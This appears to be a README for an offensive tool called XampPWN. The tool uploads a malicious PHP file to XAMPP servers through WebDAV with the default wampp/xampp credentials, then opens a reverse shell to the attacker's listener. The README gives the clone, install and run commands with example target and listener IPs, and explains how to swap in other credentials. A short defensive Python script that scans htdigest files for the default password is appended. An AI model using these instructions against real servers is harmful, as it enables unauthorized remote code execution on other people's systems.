XAMPP versions 1.7.3 and earlier (some later versions have this manually installed as well) ship with WebDAV (Web Distributed Authoring and Versioning) pre-installed and the default credentials set to wampp/xampp. This exploit sends a specially crafted malicious PHP file for Windows to the target and then executes it, resulting in a reverse shell connecting back to a listener.
From within your Linux terminal, you can use the following command to download the program.
git clone https://github.com/0xskunk/XampPWN-WebDav-File-Upload-Exploit.git
We need to make sure you have the packages installed that the program requires before it will run.
First, install pip, which is a package manager for Python.
sudo apt install python3-pip
Then, we install the required libraries.
pip3 install colorama art requests urllib3
These are all the prerequisites you need!
XampPWN makes use of the argparse library, meaning you can get the help menu to appear by typing:
python3 XAMPPWN.py -h
And use the script like:
python3 XAMPPWN.py 10.10.10.10 192.16.10.1 443
Make sure your positional arguments are in the order that the program requires when you run the exploit. Don't worry about adding http:// or https:// to the IP address - the program will add that for you if you haven't already.
Note: If the credentials are not wampp/xampp, it's easy enough to edit the script to use the ones you believe are set. Just open it in any text editor and change the username and password in the __init__ constructor!
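For administrators checking whether a host still carries the default wampp/xampp pair described at the top of this page, the following is an added example (not part of XampPWN or XAMPP) that scans an Apache htdigest-format password file for it. It assumes the WebDAV password file uses the htdigest `user:realm:MD5(user:realm:password)` layout; the function names, realm and sample entries are constructed for illustration.

```python
import hashlib

# Default WebDAV credentials named on this page.
DEFAULT_USER = "wampp"
DEFAULT_PASSWORD = "xampp"


def digest_ha1(user: str, realm: str, password: str) -> str:
    """Value stored by Apache htdigest: MD5(user:realm:password)."""
    return hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()


def find_default_credentials(htdigest_text: str):
    """Return (line_no, user, realm) for entries still using wampp/xampp."""
    findings = []
    for line_no, raw in enumerate(htdigest_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 3:
            continue  # not a user:realm:hash entry
        user, realm, stored = parts
        # Recompute with the entry's own realm so no realm name is hard-coded.
        expected = digest_ha1(user, realm, DEFAULT_PASSWORD)
        if user == DEFAULT_USER and stored.lower() == expected:
            findings.append((line_no, user, realm))
    return findings


def build_sample() -> str:
    """Constructed sample: default entry, rotated entry, other user, junk."""
    realm = "Example WebDAV realm"  # assumed realm name, not taken from XAMPP
    other = realm + " 2"
    return "\n".join([
        f"wampp:{realm}:{digest_ha1('wampp', realm, 'xampp')}",
        f"wampp:{other}:{digest_ha1('wampp', other, 'a-long-unique-passphrase')}",
        f"deploy:{realm}:{digest_ha1('deploy', realm, 'xampp')}",
        "garbage line without fields",
    ])


if __name__ == "__main__":
    for line_no, user, realm in find_default_credentials(build_sample()):
        print(f"line {line_no}: {user!r} in realm {realm!r} still uses the default password")
```

Any entry it reports should have its password rotated, or WebDAV should be disabled if it is not needed.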
Special thanks to the following GitHub repositories for the inspiration to write this script: